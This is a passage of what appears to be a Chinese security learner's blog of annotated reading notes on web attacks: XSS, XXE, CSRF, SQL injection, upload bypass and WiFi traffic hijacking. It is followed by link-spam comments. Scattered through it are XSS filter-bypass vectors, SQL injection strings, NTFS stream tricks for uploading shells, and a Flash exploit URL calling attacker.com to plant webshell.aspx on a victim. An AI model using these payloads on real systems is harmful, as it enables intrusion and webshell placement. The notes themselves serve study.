react插件,然后他通过利用提交的数据未正确的验证和react中有个属性允许直接输入html代码的这两个问题来插入xss代码】 XPATH-Assisted-XXE-Attacks+XML注入(XML数据注入、XSL注入、XPath/XQuery注入) 【 这个攻击方法也是蛮有趣的,学习了以前的xpath注入。xxe如果能加载外部实体,是可以直接读取任意文件的;xpath一般是出现在搜索框当中之类的,如果当前的表单没有什么有价值的数据,那么单纯的xpath攻击就没啥意义了。 但是,但是,如果目标主机开启了doc()方法,也就是允许远程读取文件,那么久有转机了!我们可以将xpath和xxe配合起来用。首先我们在自己的服务器上准备一个xml文件,然后注入xxe语句。接着,目标主机远程读取我们服务器上的xml文件,导致xml文件被执行。】 3.18------------------------------------------------------------------- 针对金融行业平台的渗透测试与防御 【 不管是不是金融类的,漏洞类型都差不多吧,乌云已经有很多相关案例,今天算是把垂直权限和平行权限分开了,以前以为是同一个东西的。。。】 劫持SSH会话注入端口转发 【 get姿势。】 3.17------------------------------------------------------------------- 内网渗透一:利用Xss漏洞进入内网(一定要实践,未实践) 【 beef的搭建与测试,我是一定要实践一次的,提上行动日程】 3.16------------------------------------------------------------------- uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack 等于 XSCH攻击+实例解析(Flash跨域数据劫持漏洞) How "../sms" could bypass Authy 2 Factor Authentication 【 还是api安全性验证的问题,攻击者可以跳级目录,导致返回的状态码永远都是200。】 CSRF to connect attacker's twitter account to logged in victims account 【 利用第三方的接入的验证权限没有设置tooken,来造成csrf; 1、自己登录qq等第三方,在目标站点请求第三方登录; 2、验证权限后,抓包,将目标站点获取的连接tooken的请求丢弃,把整个链接保存下来; 3、把链接发送给受害者; 你将以受害者的身份登录该目标站点】 过往------------------------------------------------------------------- iis短文件名1+iis短文件名2+工具 【 http://site/backupshgsughw9gtwheg9ewg.rar(名称字节超过8字节,后缀大于等于3字节) 通过访问http://site/backup~1.rar即可访问上面的文件】 WAF_Bypassing(很好的一个文章,实例可以配合“心伤的瘦子”来看,精精精精精精精精精精精精精精精精精精精精精) 【 其他向量不再累述: 1、formaction的利用: <form><button formaction=javascript&colon;alert(1)>CLICKME 2、<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> 3、括号被过滤的情况:<a onmouseover="javascript:window.onerror=alert;throw 1"> 4、<body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';> 5、<svg><script>alert&#40/1/&#41</script> 这个可以的原因是先html解码(在svg大环境中),再js解码,所以在js执行前&#40已被解码成(,&#41被解码成) 6、可被浏览器识别的字符:  IExplorer= [0x09,0x0B,0x0C,0x20,0x3B]  Chrome = [0x09,0x20,0x28,0x2C,0x3B]  Safari = [0x2C,0x3B]  FireFox= [0x09,0x20,0x28,0x2C,0x3B]  Opera = [0x09,0x20,0x2C,0x3B]  Android = [0x09,0x20,0x28,0x2C,0x3B] <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>rhainfosec 7、好姿势 http://site/xss.php?foo=<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:() 这里通过location.hash来获取#后面的字符,可以绕过:()被过滤的情况,通过/代码/.source+来拼接关键字符。 】 adobe-flash-security-restrictions-bypass-file-upload-by-urlrequest 【 没有分析,exp如下:http://attacker.com/fileupload.swf?jsonInputs=[{"name":"path","value":"C:\Temp\"},{"name":"cmdSubmit","value":"submit"},{"name":"txtFile","value":"<%25=(1%2b2)%25>","filename":"webshell.aspx","contenttype":"image/jpeg"}]&target=http://victim.com/uploadify/upload.asp】 Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网(老问题不代表现在就没有了) http://james.padolsey.com/javascript/fuzzy-scoring-regex-mayhem/ http://kennel209.gitbooks.io/owasp-testing-guide-v4/content/zh/ http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploit-kit-an http://www.droidsec.cn/android-broadcastanywhere%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/ http://www.droidsec.cn/%E8%AF%A6%E8%A7%A3android-app-allowbackup%E9%85%8D%E7%BD%AE%E5%B8%A6%E6%9D%A5%E7%9A%84%E9%A3%8E%E9%99%A9/ 利用redis写webshell 深入理解浏览器解析机制和XSS向量编码(可以配合后面的编码解码顺序一起看) 【 英文的看了一半,就暂时放弃了,这下360翻译了,接着看完吧。。。 几个关键点,之前不知道的: 1、你不能对协议类型进行任何的编码操作,不然URL解析器会认为它无类型。(href="javascript:alert(1)",这里的伪协议javascript就不能被编码成非实体或非字符实体,包含协议后面的:) 2、出现在注释中的Unicode转义序列永远不会被解释,因此不会导致注释换行问题 3、不能用unicode表示单引号、双引号、圆括号等等,它们将不会被解释成控制字符,unicode能表示标示符名称,如alert等。 4、JavaScript解析器会介入来对内联脚本进行解析。在这一步中Unicode转义序列和Hex转义序列被解码。 总之,<>是不能被编码的,在属性中的值,协议只能被实体或者字符实体编码(也可以理解为在html大环境中,构建dom树前会被解码),<script></script>中只能识别unicode、js 8、js 16编码,并且只能对标示符进行编码,不能对其中的()'"进行unicode编码。 】 Mario的三个好文章-1,密码:58c7(未看) Mario的三个好文章-2,密码:kwql(未看) Mario的三个好文章-3,密码:kocj(未看) HTML5跨域消息发送安全性分析 NodeJS 应用仓库钓鱼 躲避 HSTS 的 HTTPS 劫持 【 是流量劫持三部曲的补充,通过直接在域名中做标记来躲过hsts的检查,还可以结合二级三级域名来构造证书。 】 延长 XSS 生命期【精精精精精精精精精精精精精精精精精精精】 【 终于看懂了,一感染一个域名,所有子域也能被感染。】 流量劫持是如何产生的? 【 EtherDream真的是一个很厉害的人,不仅前端了得,你妈的连交换路由都有一套,不得不佩服。作者列举了从“集线器”到“(家用)路由”到“wifi"到"wlan"的流量劫持的知识点。其中提到一些比较有意思的方法: 1、pppoe下,通过pppoe协议栈的问题,伪装成认证服务器来给客户机下发认证失效消息,从而让客户机后面连到自己的服务器上; 2、wifi下的钓鱼,其中很有趣的一种想法是通过不断的伪造,一直下发认证失效信息,让所有的客户端都无法连接,最后让管理员逼不得已重置路由器,这时候的路由器是处于弱口令状态下,有很大的机会拿下整个路由器; 3、在"wlan"下,通过伪造"CCMC"等,通过竞速来搭建钓鱼热点。】 流量劫持能有多大危害? 【 在这篇文章中,作者讲述了流量劫持到底能做到什么程度。 1、劫持流量后,向浏览的页面中嵌入脚本,可以通过像XSS那样,以图片或者其他的方式向已登录的网站发起请求,从而获取你的cookie; 2、劫持流量后,即使你离线了,下次还是会继续被投毒,因为有些网站的脚本的缓存时间是非常长的,如果被我们劫持了,并且你没有清空缓存的话,那么在脚本的生存期内,你一直属于中毒状态。还有就是在html5,通过mainfest属性,可以在本地以文件的形式进行缓存。 3、劫持流量后,我们可以通过强制将https的访问降级为http的访问,这样明文密码还是被劫持了。】 流量劫持 —— 浮层登录框的隐患 【 方法如下面的三部曲那样,通过劫持,注入插入xss代码后的的可长期缓存的脚本,实现浮层登陆框的账号密码截取。】 三部曲-1-把笔记本改造成无线路由器 —— 手机抓包牛刀小试 三部曲-2-WiFi流量劫持—— 浏览任意页面即可中毒! 三部曲-3-WiFi流量劫持—— JS脚本缓存投毒【找时间实操】 【 连接到我们的wifi热点上,将dns服务器指为自己,劫持80端口的流量(或者更好的判定是web访问的流量),代为转发查询,返回的数据添加缓存时间长的js脚本(如163网站的js等)并向其中注入我们的外网xss代码,再转发给客户机。客户机只要不更新缓存,则一直处于被劫持中。 作者思路太吊,一定要找个时间,把这个实现一次(作者有demo,但是demo的代码已删除),作者用的是nodejs实现的,主要包括DNS、HTTP代理、代码分析和注入】 膝盖已烂1-SSLStrip 的未来 —— HTTPS 前端劫持 膝盖已烂2-SSLStrip 终极版 —— location 瞒天过海 NTFS ADS数据交换流 带来的WEB安全问题 【 虽然是13年的甚至更多年前的,现在看到,也还是觉得太涨姿势了!!!! 文件名:流的名称(可选):流的类型(必写,只能是系统定义的) 1.php::$INDEX_ALLOCATION 生成1.php文件夹; 1.php:$I30:$INDEX_ALLOCATION 生成1.php文件夹; 1.php::$DATA…………. 生成1.php文件; 在mysql5.1中,要导出到mysql目录的lib\plugin下,如果没有该目录,可以使用 select‘xxx’ into outfile ‘c:\test::$INDEX_ALLOCALTION\’;的方式来生成这个目录】 php懈垢windows通用上传缺陷+file-upload-and-php-on-iis-wildcards 【 当php+iis+win采用黑名单过滤php后缀名文件的时候,可以尝试上传a.php:jpg,这样会产生一个a.php的空文件,之后利用在win下"<"等同于"*",再上传a.<<<覆盖,这样shell就上去了!!!("等同于.、>等同于?) 或者通过a.php::$DATA文件流直接上传php文件】 Tools审计一则+源码 【 新学到了一个知识点,以前没看见过的。1.php::$DATA //ntfs流文件解析 会自动去除后面的::$data,用于绕过限制php文件的黑名单匹配】 CSRF Token Protection Bypass Methods 【 1、有token,但是如果去掉token还是仍能正常提交; 2、简单的加密,比如简单的ma5(email,递增的某个值)或者时间搓之类的; 3、token分成静态+动态的一串加密的字符,但是只提交静态的就能通过或者动态的加密字符是递增的; 4、通过xss的dom操作去读取token; 5、被用过的token不失效,还能继续使用。 6、... 怎么bypass需要多次获取,查看获取的token是否有规则。】 Column Truncation SQL Injection Vulnerability 【 这个有点意思,之前不知道的。场景是数据库验证的字段长是20,而应用不设置字段限制,于是可能出现注册名是:"admin连续15个空格x"(最后面的x是为了避免前面的空格被当成一个空格处理)。因为x是第21位,会被数据库截断,所以前面的admin连续15个空格在经过Trim()处理后就变成admin,这样造成了admin被重复注册。】 Blind Referer SQL injection 【 当我们不知道数据库的表的时候,可以通过'or (selecrt '123' from DUAL where '1'='1')or ' 来判断是否有注入】 通过email下载xml文件,ms office打开后感染电脑 【 the older 2003版本,会把xml文件当做doc文件来执行,如果你的ms office开启了宏命令,会导致隐藏在其中的经过免杀编码等操作的恶意代码被执行。 】 API安全 【 无非就是httponly+csrf_token,国内的api好像没这么干】 浏览器的工作原理(未看完) 通过CSP策略来判断一个用户是否登录facebook 【 前提条件是:使用chrome浏览器,支持cookie,因为现如今的chrome使用的csp版本是有这个问题的。 原理是fackbook有个用户空间的链接,www.fb.com/me。如果你是tom且登陆了,那么你访问这个链接就到达了www.fb.com/tom,而如果你没有登录,访问这个链接就会到达www.fb.com/login.php 然后在我们的网站上,我们可以设置csp策略成允许www.fb.com/me,www.fb.com/login.php。如果你是tom已经登录了,那么你访问www.fb.com/me理论上是要跳转到www.fb.com/tom的,但是csp中并没有允许这样的链接,所以会被拦截;如果你没有登录,你访问www.fb.com/me,你会被跳转到www.fb.com/login.php,而这个链接是csp允许的,所以可以正常访问。通过csp是否拦截,我就已经知道你是否登录了facebook这个网站了。(策略是在我网站生成的,你访问我网站的时候,会遵循我设置的策略) 然后,判断你登陆后,甚至通过暴力的手法来猜解你的用户名。作者是用二分法的手段来实现的(用户名可以通过爬区网站或者自己生成),请求的数量是比较低的,通过gzip也可以实现占用较少的资源。首先,将要猜解的用户名放到csp的白名单中,比如www.fb.com/1、www.fb.com/2...;然后访问的时候,判断是否是在其中;下一步,知道在某一部分中了,再改变策略,将这部分的名单再加入白名单;重复这些步骤,直到用户名不在猜解列表中,或者用户名已被猜解出来。 这个问题,可能在谷歌之后的版本中会修正,只需要更新浏览器的csp版本,后面的版本中有对这种情况进行预防。 这个问题举例的是facebook,支付宝之类的可能也会有这样的问题,看过类似的文章。 】 指导如何使用CSP window.location = window.location.pathname带来的问题 +demo 【看不太懂】 重放攻击 不错的XSS过滤脚本,支持hook 逻辑漏洞图via BMa 利用window.opener钓鱼+延长 XSS 生命期+window.opener 【 当你点击了链接之后,因为_blank属性,会打开一个新的页面;在这个新的页面中,通过window.opener属性window.opener.location.replace("链接")将父页面替换成该"链接" mario给出的解决方案是:opener.__proto__=null,或者target="_blank"rel="noreferrer" 】 RSYNC服务 【 rsync未授权访问的例子好多。。。】 实体终端hack 【 有机会尝试一下;尝试过建行的,直接ie浏览器找文件->打开->浏览就能跳出窗口了,银行的没加固过的基本上都这样;学校有那种读报机,安卓系统,长按就能跳出当前窗口,玩过一阵子,后来机子被弄成只能看,不能点击了。。。。。】 对log进行ip ban等权限操作 java-jetty的问题 hack WYSIWYG,密码: xljv 【 和普通的xss手法是一样一样的啊。】 CSP原文(未看) 微博第三方抽奖平台导致的问题 【 平台允许第三方应用获取权限,而这个第三方应用如果出了安全问题,也就等于你获取了该平台赋予给的第三方的所有权限。】 cgi+ssi+xss=server_shell 【 当linux服务器以cgi来运行web 应用的时候,如果开启了SSI,也就是服务端可以嵌入脚本执行的服务,那么我们利用xss,可以导致命令的执行】 【安卓类】 关机并不“关机”

SSO可能带来的问题

【 这篇文章讲明了当业务需要,需要修改登录方式时,由于考虑的不够充分,导致权限被盗取的情况的出现。】

DNS缓存投毒

改写SQLMAP的bypass规则

比较详细的CSRF说明

SSRF(图片via BMa)

SSJS Web Shell Injection(js注入)

从一个默认口令到youku和tudou内网

dnspython的dns查询

XSCH攻击+实例解析(Flash跨域数据劫持漏洞)

通过crossdomain.xml 或者 clientaccesspolicy.xml的配置错误来读取该网站的相关文件的内容; 通过直接上传swf等文件造成的可通信,导致的文件读取 】

防xss的ERP扩展工具

利用某漏洞进行支付宝支付密码劫取(何时能有这样的造诣)

安卓套件说明(工具在源码/工具里)

看我是如何利用zbbix渗透sogou&sohu内网的

从一个司机的邮箱开始测试新网(Zabbix、cacti、Zenoss、BSS、防火墙、VPN等N多系统沦陷)

存储型XSS从易到难的挖掘过程

【 看了一下这个,其实按我现在的认知程度是能够实现了。

想要实现该篇所说的,你需要掌握以下知识:编码顺序,也就是你的可控点所在的环境到底是先解码什么再解码什么;对构造xss代码的方式要有相当清晰的认识;得有探究的精神,去测试他的过滤规则。

使用Kali Linux在渗透测试中信息收集

evercookie

通过DNS跑注入点

取代cookie的网站追踪技术:”帆布指纹识别”初探


【mail类的xss】

RoundCube Webmail邮件最新版正文存储型XSS


http://www.th7.cn/web/html-css/201407/46079.shtml

百度浏览器1

百度浏览器2

百度浏览器远程命令执行三

百度浏览器远程命令执行四

http://zhuanlan.zhihu.com/wooyun/19817088

http://www.cnblogs.com/hongfei/archive/2014/07/22/sqlmap-xml.html

DiscuzX系列命令执行分析公开(三连弹)

再谈内网渗透

从零开始学csrf


【xxe】

XXE注入攻击与防御

DOCX XXE 详细步骤【叼叼叼】

  1. 【docx-1】蘑菇街存在XXE漏洞
  2. 【docx-2】QQ邮箱XXE可读取任意文件
  3. 【docx-3】天翼云一处xxe漏洞可读取任意文件

鲜果网RSS导入Blind XXE漏洞(Blind XXE漏洞) http://www.wooyun.org/bugs/wooyun-2010-074069

百度某功能XML实体注入 http://wooyun.org/bugs/wooyun-2010-058381

  1. 百度某功能XML实体注入(绕过) http://www.wooyun.org/bugs/wooyun-2010-059783

从开源中国的某XXE漏洞到主站shell http://www.wooyun.org/bugs/wooyun-2010-059911

阿迪达斯中国官方旗舰店本地文件包含漏洞 http://www.wooyun.org/bugs/wooyun-2010-09302

  1. 艾格中国(Etam)任意文件读取漏洞 http://www.wooyun.org/bugs/wooyun-2010-09341

http://segmentfault.com/blog/binux/1190000002477863

http://es6.ruanyifeng.com/

http://drops.wooyun.org/author/DM_

CSRF简单介绍及利用方法 http://drops.wooyun.org/papers/155

Browser Security-同源策略、伪URL的域 http://drops.wooyun.org/tips/151

Browser Security-css、javascript http://drops.wooyun.org/tips/150

Browser Security-基本概念 http://drops.wooyun.org/papers/146

jother编码之谜 http://drops.wooyun.org/web/4410

MongoDB安全配置 http://drops.wooyun.org/%e8%bf%90%e7%bb%b4%e5%ae%89%e5%85%a8/2470

Clickjacking简单介绍 http://drops.wooyun.org/papers/104

clickjacking漏洞的挖掘与利用 http://drops.wooyun.org/web/3801

clickjacking实例,挺好的 http://wooyun.org/bugs/wooyun-2010-071676

【我一直以为这个类似于csrf那样构造链接就可以了,其实不是,这个是通过将网站直接给嵌套进来了,然后将嵌套的这个层放在最上面,然后使得这个层透明化,再在这个层下面,加载我们自己构造的层,将这个层的某个按钮放置与目标网站的按钮下,这样虽然你点的是看到的按钮,其实你是点击了那个网站的那个按钮功能了!

防止被嵌套的解决方法,通过判断这个ifram与自己网站的顶级窗口是不是一致,既是判断是不是嵌套了自己的网站,如果是,则让其直接跳转到我自己的网站,或者干脆不给于显示。

if (window.top!=window.self) {window.top.location="../logon/logon.htm"}】

有什么有效方法防止网站被iframe嵌套? http://www.dewen.io/q/920 使用LDAP查询快速提升域权限 http://drops.wooyun.org/pentesting/2125 HttpOnly 隐私嗅探器【高端】 http://drops.wooyun.org/tips/2834 Web前端攻防【高端/opener属性钓鱼】 http://drops.wooyun.org/tips/2686 上传文件的陷阱II 纯数字字母的swf是漏洞么?【高端flash,不懂~以后再说】 http://drops.wooyun.org/tips/2554 应用程序逻辑错误总结 http://drops.wooyun.org/papers/1418 http://drops.wooyun.org/papers/1383【看不懂】 http://drops.wooyun.org/tips/1060 https://github.com/borisreitman/CrossXHR 【工具】 雅虎某分站的XSS导致雅虎邮箱沦陷 http://drops.wooyun.org/papers/1024 mXSS攻击的成因及常见种类【慢慢品味】 http://drops.wooyun.org/tips/956 "一句话"的艺术——简单的编码和变形绕过检测 http://drops.wooyun.org/tips/839 【实现自己的免杀一句话】

浏览器安全(一) http://drops.wooyun.org/papers/526 Short XSS(方法失效,只是思路) http://drops.wooyun.org/papers/512 详解XMLHttpRequest的跨域资源共享 http://drops.wooyun.org/tips/188 Clickjacking简单介绍 http://drops.wooyun.org/papers/104 URL重定向/跳转漏洞 http://drops.wooyun.org/papers/58 http://drops.wooyun.org/papers/44【这个需要慢慢品味了。。。】

Json hijacking/Json劫持漏洞【寻找案例巩固】 http://drops.wooyun.org/papers/42


评论


回复内容MSiEXW <a href="http://otjqtwwcsatu.com/">otjqtwwcsatu</a>, [url=http://hpydqhqalncf.com/]hpydqhqalncf[/url], [link=http://ogttxebmdsij.com/]ogttxebmdsij[/link], http://vegnvkotpolf.com/
来自ybpspks(2017-07-30 09:34:58)
回复内容3vUcdL <a href="http://usshjgkabtvd.com/">usshjgkabtvd</a>, [url=http://mgnteqwqtmft.com/]mgnteqwqtmft[/url], [link=http://cevjptkcwxpu.com/]cevjptkcwxpu[/link], http://msaeqkoswaxo.com/
来自drjevzi(2017-08-08 13:41:06)
回复内容XgO88y <a href="http://zdhjgihaazva.com/">zdhjgihaazva</a>, [url=http://hbxihmfcfhmn.com/]hbxihmfcfhmn[/url], [link=http://knfwansnzfku.com/]knfwansnzfku[/link], http://ywmlxxkqgkiv.com/
来自qbcpvxil(2017-08-26 18:42:13)





来说点什么吧